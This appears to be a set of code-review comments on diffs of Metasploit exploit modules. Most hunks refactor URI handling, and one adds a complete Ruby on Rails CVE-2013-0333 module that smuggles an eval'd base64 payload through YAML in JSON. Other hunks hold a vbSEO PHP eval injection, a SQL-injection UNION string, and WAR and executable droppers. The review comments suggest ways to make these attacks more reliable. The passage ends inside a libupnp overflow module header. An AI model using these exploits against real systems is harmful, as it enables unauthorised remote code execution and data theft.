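Review bot: The result of the POST that sends the PHP payload is discarded (`send_request_cgi({ 'method' => 'POST', ... 'data' => php })`), so a nil response or a non-200 status goes unnoticed and the module still requests data.php and calls `handler`. Capture it and stop early, `res = send_request_cgi({...})` followed by `print_error("#{peer} - Upload failed"); return unless res and res.code == 200`, mirroring the check already done on the first request in this section. The enclosing method begins outside the hunk.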


@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
res = send_request_raw({'uri'=>"#{base}/index.php"})
res = send_request_raw({'uri'=>normalize_uri(uri, "/index.php")})
if res and res.body =~ /MobileCartly/
return Exploit::CheckCode::Detected
else
@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
print_status("#{@peer} - Uploading payload")
res = send_request_cgi({
'uri' => "#{base}/includes/savepage.php",
'uri' => normalize_uri(base, "/includes/savepage.php"),
'vars_get' => {
'savepage' => php_fname,
'pagecontent' => get_write_exec_payload(:unlink_self=>true)
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Run payload
#
print_status("#{@peer} - Requesting '#{php_fname}'")
send_request_cgi({ 'uri' => "#{base}/pages/#{php_fname}" })
send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
handler
end
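Review bot: In `check`, the request now uses `normalize_uri(uri, "/index.php")` while `base = File.dirname("#{uri}.")` on the line above is left unused there, yet the other hunks build every path from `base` (`normalize_uri(base, "/includes/savepage.php")`, `normalize_uri(base, 'pages', php_fname)`). Writing `normalize_uri(base, "/index.php")` in `check` as well keeps the two methods consistent and removes the dead local. `check` begins outside the hunk.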


@ -98,7 +98,7 @@ class Metasploit4 < Msf::Exploit::Remote
end
def http_send_raw(cmd)
path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi'
path = normalize_uri(target_uri.path, '/mt-upgrade.cgi')
pay = cmd.gsub('\\', '\\\\').gsub('"', '\"')
send_request_cgi(
{


@ -89,10 +89,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
base = normalize_uri(target_uri.path)
base = target_uri.path
base << '/' if base[-1, 1] != '/'
path = "#{base}login.jsp"
path = normalize_uri(base, "login.jsp")
res = send_request_cgi(
{
'uri' => path
@ -183,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
data << "\r\n--#{boundary}--"
res = send_request_cgi({
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"),
'method' => 'POST',
'data' => data,
'headers' =>
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Exploit::Remote
if datastore['REMOVE_PLUGIN']
print_status("Deleting plugin #{plugin_name} from the server")
res = send_request_cgi({
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase,
'headers' =>
{
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
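Review bot: In `check`, `base = target_uri.path` followed by `base << '/' if base[-1, 1] != '/'` appends to the returned string in place (mutating it if that object is shared) and is redundant now that `normalize_uri(base, "login.jsp")` joins the segments; `base = normalize_uri(target_uri.path)` covers it. In the later hunks the query string (`?uploadplugin`, `?deleteplugin=`) is passed into normalize_uri together with the path, whereas other modules in this commit append it afterwards, e.g. `normalize_uri(base, "setup/setup-/../../plugin-admin.jsp") + "?uploadplugin"`; keeping the query outside means path normalization cannot rewrite it. The enclosing methods run beyond the hunks.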


@ -96,11 +96,9 @@ class Metasploit3 < Msf::Exploit::Remote
]
qs = args.join()
uri = normalize_uri(target_uri)
uri = normalize_uri(target_uri.path)
uri = "#{uri}?#{qs}"
#print_status("URI: #{target_uri}?#{qs}") # Uncomment to preview URI
# Has to be all on one line, so gsub out the comments and the newlines
payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
response = send_request_cgi( {
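Review bot: The commented-out debugging line `#print_status("URI: #{target_uri}?#{qs}") # Uncomment to preview URI` would serve better as `vprint_status("URI: #{uri}")` placed after `uri = "#{uri}?#{qs}"`, so the final path is visible under VERBOSE without editing the module and it shows the normalized `uri` rather than the raw `target_uri`. The enclosing method starts and ends outside the hunk.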


@ -252,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Trying file: #{f}")
send_request_raw({
'method' => 'GET',
'uri' => "#{base}mods/documents/uploads/#{f}",
'uri' => normalize_uri(base, 'mods/documents/uploads/', f),
'cookie' => cookie
})
end


@ -56,9 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'index.php'
uri = normalize_uri(datastore['URI'], 'index.php')
res = send_request_raw(
{
@ -74,9 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def get_session
uri normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'index.php'
uri = normalize_uri(datastore['URI'], 'index.php')
res = send_request_raw(
{


@ -73,13 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
uri = target_uri.path
print_status("#{rhost}#{rport} - Sending request...")
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}drawimage.php",
'uri' => normalize_uri(uri, "drawimage.php"),
'vars_get' => {
'pdf' => 'make',
'pfilez' => "xxx; #{payload.encoded}"
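Review bot: The status message `print_status("#{rhost}#{rport} - Sending request...")` joins host and port with no separator, so they run together; the other modules in this commit use `"#{rhost}:#{rport}"`. With normalization moved into the request, the local `uri = target_uri.path` is used exactly once and can be inlined as `'uri' => normalize_uri(target_uri.path, "drawimage.php")`. `exploit` continues past the hunk.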


@ -61,9 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
res = send_request_raw(
{
@ -77,9 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
send_request_cgi(
{
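Review bot: The path `'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'` is duplicated verbatim in `check` and `exploit`; hoisting it into a frozen constant, or a small helper returning `normalize_uri(datastore['URI'], TARGET_PATH)`, keeps the two from drifting apart. Both methods continue beyond the hunks.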


@ -73,8 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
header = rand_text_alpha_upper(3)
header_append = rand_text_alpha_upper(4)
uri = normalize_uri(datastore['URI'])
uri += (datastore['URI'][-1, 1] == "/") ? 'pmwiki.php' : '/pmwiki.php'
uri = normalize_uri(datastore['URI'], "pmwiki.php")
res = send_request_cgi({
'method' => 'POST',


@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
res = send_request_raw({'uri'=>"#{base}/index.php"})
res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")})
if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
major, minor = $1, $2
return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Login
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/index.php/home/login",
'uri' => normalize_uri("#{base}/index.php/home/login"),
'vars_post' => {
'login[email]' => username,
'login[password]' => password,
@ -187,7 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/index.php/home/myAccount",
'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie,
@ -205,7 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote
# When we upload a file, it will be renamed. The 'myAccount' page has that info.
res = send_request_cgi({
'uri' => "#{base}/index.php/home/myAccount",
'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
'cookie' => cookie
})
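Review bot: The `check` hunk joins with `normalize_uri(base, "/index.php")` while the remaining hunks of this file pass a pre-joined string, `normalize_uri("#{base}/index.php/home/login")`; both work, but one form per module reads better, and `normalize_uri(base, "index.php", "home", "login")` matches the segment style used elsewhere in this commit. Independently, `major, minor = $1, $2` would be clearer as `major, minor = Regexp.last_match(1), Regexp.last_match(2)`. The enclosing methods start and end outside the hunks.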


@ -0,0 +1,118 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the
JSON request processor of the Ruby on Rails application framework.
This vulnerability allows an attacker to instantiate a remote object,
which in turn can be used to execute any ruby code remotely in the
context of the application. This vulnerability is very similar to
CVE-2013-0156.
This module has been tested successfully on RoR 3.0.9, 3.0.19, and
2.3.15.
The technique used by this module requires the target to be running a
fairly recent version of Ruby 1.9 (since 2011 or so). Applications
using Ruby 1.8 may still be exploitable using the init_with() method,
but this has not been demonstrated.
},
'Author' =>
[
'jjarmoc', # Initial module based on cve-2013-0156, testing help
'egypt', # Module
'lian', # Identified the RouteSet::NamedRouteCollection vector
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-0333'],
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DisclosureDate' => 'Jan 28 2013',
'DefaultOptions' => { "PrependFork" => true },
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ])
], self.class)
end
#
# Create the YAML document that will be embedded into the JSON
#
def build_yaml_rails2
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
"eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
yaml.gsub(':', '\u003a')
end
#
# Create the YAML document that will be embedded into the JSON
#
def build_yaml_rails3
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
yaml.gsub(':', '\u003a')
end
def build_request(v)
case v
when 2; build_yaml_rails2
when 3; build_yaml_rails3
end
end
#
# Send the actual request
#
def exploit
[2, 3].each do |ver|
print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/json',
'headers' => { 'X-HTTP-Method-Override' => 'get' },
'data' => build_request(ver)
}, 25)
handler
end
end
end
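Review bot: `build_request(v)` has no `else` branch, so any value other than 2 or 3 silently yields `nil` for the `'data'` key instead of an error; adding `else raise ArgumentError, "Unsupported Rails version: #{v}"` makes the contract explicit. In `exploit` the response from `send_request_cgi` is discarded and `handler` is called unconditionally for each version, so a nil response (timeout) cannot be told apart from a delivered request; at minimum capture it and `vprint_status` the outcome. The two `build_yaml_rails*` methods repeat `Rex::Text.rand_text_alpha(rand(8)+1)` several times, and a short local helper would keep those strings readable.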


@ -10,7 +10,6 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -47,14 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DisclosureDate' => 'Jan 7 2013',
'DefaultOptions' => { "PrependFork" => true },
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ])
], self.class)
register_evasion_options(
@ -63,35 +62,12 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
#
# This stub ensures that the payload runs outside of the Rails process
# Otherwise, the session can be killed on timeout
#
def detached_payload_stub(code)
%Q^
code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
inp = IO.popen("ruby", "wb") rescue nil
if inp
inp.write(code)
inp.close
end
else
if ! Process.fork()
eval(code) rescue nil
end
end
^.strip.split(/\n/).map{|line| line.strip}.join("\n")
end
#
# Create the YAML document that will be embedded into the XML
#
def build_yaml_rails2
# Embed the payload with the detached stub
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
@ -108,8 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
def build_yaml_rails3
# Embed the payload with the detached stub
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
@ -164,24 +139,17 @@ class Metasploit3 < Msf::Exploit::Remote
#
def exploit
print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
res = send_request_cgi({
[2, 3].each do |ver|
print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml',
'headers' => { 'X-HTTP-Method-Override' => 'get' },
'data' => build_request(3)
}, 25)
handler
print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml',
'headers' => { 'X-HTTP-Method-Override' => 'get' },
'data' => build_request(2)
'data' => build_request(ver)
}, 25)
handler
end
end
end
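Review bot: The request in the last hunk still uses `'uri' => datastore['URIPATH'] || "/"` even though URIPATH is a required option with default `"/"` (so the `|| "/"` is dead) and the rest of this commit routes paths through `normalize_uri`; the sibling JSON module added in the same commit uses `normalize_uri(target_uri.path)`. Changing it to `'uri' => normalize_uri(datastore['URIPATH'])` brings it in line, and renaming the option to TARGETURI would let both modules share `target_uri`. The loop also drops the `res =` assignment, so a nil response from `send_request_cgi` is no longer observable before `handler` runs. `exploit` ends inside the hunk; `initialize` and the YAML builders extend beyond theirs.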


@ -64,12 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = normalize_uri(datastore['URI'])
if uri[-1,1] != '/'
uri = uri + "index.php"
else
uri = uri + "/index.php"
end
uri = normalize_uri(datastore['URI'], "index.php")
res = send_request_raw({
'uri' => uri
@ -91,12 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
def retrieve_session(user, pass)
uri = normalize_uri(datastore['URI'])
if uri[-1,1] == "/"
uri = uri + "login.php"
else
uri = uri + "/login.php"
end
uri = normalize_uri(datastore['URI'], "login.php")
res = send_request_cgi({
'uri' => uri,
@ -121,12 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
def upload_page(session, newpage, contents)
uri = normalize_uri(datastore['URI'])
if uri[-1,1] == "/"
uri = uri + "ftp_upload_file.php"
else
uri = uri + "/ftp_upload_file.php"
end
uri = normalize_uri(datastore['URI'], "ftp_upload_file.php")
boundary = rand_text_alphanumeric(6)
@ -187,12 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
def cmd_shell(cmdpath)
print_status("Calling payload: #{cmdpath}")
uri = normalize_uri(datastore['URI'])
if uri[-1,1] == "/"
uri = uri + cmdpath
else
uri = uri + "/#{cmdpath}"
end
uri = normalize_uri(datastore['URI'], cmdpath)
send_request_raw({
'uri' => uri

View File

@ -181,40 +181,46 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit_java
print_status("#{@peer} - Uploading WAR file")
jsp_name = "index"
app_base = rand_text_alphanumeric(4+rand(32-4))
war = payload.encoded_war({
:app_name => app_base,
:jsp_name => jsp_name,
}).to_s
war = payload.encoded_war({ :app_name => app_base }).to_s
war_filename = path_join(install_path, "webapps", "#{app_base}.war")
war_filename = path_join(install_path, "webapps","#{app_base}.war")
register_files_for_cleanup(war_filename)
dropper = jsp_drop_bin(war, war_filename)
dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp"
upload_and_run_jsp(dropper_filename, dropper)
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
send_request_cgi(
print_status("#{@peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
def exploit_native
print_status("#{@peer} - Uploading executable file")
exe = payload.encoded_exe
exe_filename = Rex::Text.rand_text_alpha(8)
exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))
if target['Platform'] == "win"
exe << ".exe"
end
register_files_for_cleanup(exe_filename)
dropper = jsp_drop_and_execute(exe, path_join(install_path, exe_filename))
dropper = jsp_drop_and_execute(exe, exe_filename)
dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp"
upload_and_run_jsp(dropper_filename, dropper)
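Review bot: In `exploit_native`, `exe << ".exe"` appends the extension to the payload bytes rather than to the file name: after this change `exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))` is what is registered for cleanup and written, so on the `win` target the dropped file has no `.exe` suffix and the executable contents carry four trailing bytes; it should read `exe_filename << ".exe"`. In `exploit_java`, `jsp_name = "index"` is now unused since `:jsp_name => jsp_name` was dropped from the `encoded_war` call, and the polling loop only `break`s on `res.nil?` or `res.code == 200`, which deserves a comment such as `# any other status (e.g. 404 while the WAR is still deploying) => keep polling`. `exploit_native` continues beyond the hunk.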


@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
base = normalize_uri(target_uri.path)
base = target_uri.path
base << '/' if base[-1, 1] != '/'
peer = "#{rhost}:#{rport}"
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}login.php"
'uri' => normalize_uri(base, "login.php")
})
return Exploit::CheckCode::Unknown if res.nil?
@ -185,7 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}lib/attachments/attachmentupload.php?id=#{id}&tableName=#{table}",
'uri' => normalize_uri(base, "lib/attachments/attachmentupload.php") + "?id=#{id}&tableName=#{table}",
'cookie' => datastore['COOKIE'],
})
if res and res.code == 200
@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}upload_area/#{table}/#{id}/"
'uri' => normalize_uri(base, "upload_area", table, id)
})
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1
@ -238,11 +238,11 @@ class Metasploit3 < Msf::Exploit::Remote
# attempt to retrieve real file name from the database
if @token.nil?
print_status("#{@peer} - Retrieving real file name from the database.")
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}#{sqli}",
'uri' => sqli,
'cookie' => datastore['COOKIE'],
})
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@ -263,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
send_request_cgi({
'method' => 'GET',
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
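Review bot: `base = target_uri.path` followed by `base << '/' if base[-1, 1] != '/'` in `check` appends to the returned string in place and is redundant now that every request in this section joins with `normalize_uri(base, ...)`; `base = normalize_uri(target_uri.path)` is enough. The `sqli` line keeps its query string outside `normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=..."`, which is the right split and the pattern the other modules in this commit should follow. `@token = $1` would read better as `@token = Regexp.last_match(1)`. `check` and the later methods begin and end outside the hunks.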


@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# UPLOAD
#
path_tmp = normalize_uri(datastore['PATH']) + "/deploy" + query_str
path_tmp = normalize_uri(datastore['PATH'], "deploy") + query_str
print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
res = send_request_cgi({
'uri' => path_tmp,
@ -247,7 +247,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# DELETE
#
path_tmp = normalize_uri(datastore['PATH']) + "/undeploy" + query_str
path_tmp = normalize_uri(datastore['PATH'], "/undeploy") + query_str
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'uri' => path_tmp,
@ -263,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def query_serverinfo()
path = normalize_uri(datastore['PATH']) + '/serverinfo'
path = normalize_uri(datastore['PATH'], '/serverinfo')
res = send_request_raw(
{
'uri' => path
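Review bot: The three paths in this file are joined inconsistently, `normalize_uri(datastore['PATH'], "deploy")` in the first hunk versus `normalize_uri(datastore['PATH'], "/undeploy")` and `'/serverinfo'` in the others; normalize_uri accepts both spellings, but one form per file is easier to scan. `def query_serverinfo()` can drop the empty parentheses, `def query_serverinfo`, per the usual Ruby style. The enclosing methods run beyond the hunks.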


@ -58,8 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri += (uri[-1, 1] == "/") ? "admincp/login.php" : "/admincp/login.php"
uri = normalize_uri(datastore['URI'], "admincp", "login.php")
res = send_request_raw(
{
@ -75,8 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
p = Rex::Text.encode_base64(payload.encoded)
uri = normalize_uri(datastore['URI'])
uri += (uri[-1, 1] == "/") ? "admincp/plugins.php?newhook" : "/admincp/plugins.php?newhook"
uri = normalize_uri(datastore['URI'], "admincp", "plugins.php") + "?newhook"
res = send_request_cgi(
{
@ -92,8 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}, 25)
uri = normalize_uri(datastore['URI'])
uri += (uri[-1, 1] == "/") ? "index.php" : "/index.php"
uri = normalize_uri(datastore['URI'], "index.php")
res = send_request_cgi(
{


@ -55,9 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
flag = rand_text_alpha(rand(10)+10)
data = "char_repl='{${print(#{flag})}}'=>"
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'vbseocp.php'
uri = normalize_uri(datastore['URI'], 'vbseocp.php')
response = send_request_cgi({
'method' => "POST",
@ -82,9 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'vbseocp.php'
uri = normalize_uri(datastore['URI'], 'vbseocp.php')
response = send_request_cgi({
'method' => 'POST',


@ -63,8 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
res1 = send_request_raw({'uri'=>"#{base}/index.php"})
res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"})
res1 = send_request_raw({'uri'=>normalize_uri("#{base}/index.php")})
res2 = send_request_raw({'uri'=>normalize_uri("#{base}/work/resultimage.php")})
if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and
res2 and res2.code == 200
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/work/resultimage.php",
'uri' => normalize_uri("#{base}/work/resultimage.php"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
@target_path = "#{base}/results/#{fname}"
@target_path = normalize_uri("#{base}/results/#{fname}")
print_status("#{peer} - Requesting #{@target_path}")
res = send_request_cgi({'uri'=>@target_path})


@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
def get_cookie
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php"
'uri' => normalize_uri(@base, "wikka.php")
})
# Get the cookie in this format:
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
def login(cookie)
# Send a request to the login page so we can obtain some hidden values needed for login
uri = "#{@base}wikka.php?wakka=UserSettings"
uri = normalize_uri(@base, "wikka.php") + "?wakka=UserSettings"
res = send_request_raw({
'method' => 'GET',
'uri' => uri,
@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Get the necessary fields in order to post a comment
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
'uri' => normalize_uri(@base, "wikka.php") + "?wakka=#{datastore['PAGE']}&show_comments=1",
'cookie' => cookie
})
@ -189,11 +189,11 @@ class Metasploit3 < Msf::Exploit::Remote
# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
uri = normalize_uri("#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment")
post_data = ""
send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
'uri' => uri,
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
send_request_raw({
'method' => 'GET',
'uri' => "#{@base}spamlog.txt.php"
'uri' => normalize_uri(@base, "spamlog.txt.php")
})
end
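Review bot: The Referer header `'Referer' => "http://#{rhost}:#{port}/#{uri}"` is malformed in both branches of `port`: `port` is `""` or `":#{rport}"` and already carries the colon, so the header reads `http://host:/...` on port 80 and `http://host::PORT/...` otherwise, and since `uri` now comes from `normalize_uri` (which appears to guarantee a leading slash) the literal `/` adds a second one. Use `'Referer' => "http://#{rhost}#{port}#{uri}"`. In the same hunk the query string is folded into `normalize_uri("#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment")`, unlike the earlier hunks which append it after `normalize_uri(@base, "wikka.php")`; keep the query outside so the PAGE value cannot be rewritten by path normalization. `login` and the comment-posting method extend beyond the hunks.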


@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'evilcry', # pbot analysis'
'Jay Turla', # pbot analysis
'@bwallHatesTwits', # PoC
'bwall', # aka @bwallHatesTwits, PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,


@ -0,0 +1,349 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution',
'Description' => %q{
This module exploits a buffer overflow in the unique_service_name()
function of libupnp's SSDP processor. The libupnp library is used across
thousands of devices and is referred to as the Intel SDK for UPnP
Devices or the Portable SDK for UPnP Devices.
Due to size limitations on many devices, this exploit uses a separate TCP
listener to stage the real payload.
},
'Author' => [
'hdm', # Exploit dev for Supermicro IPMI
'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI
'Richard Harman <richard[at]richardharman.com>' # Binaries, system info, testing for Supermicro IPMI
],
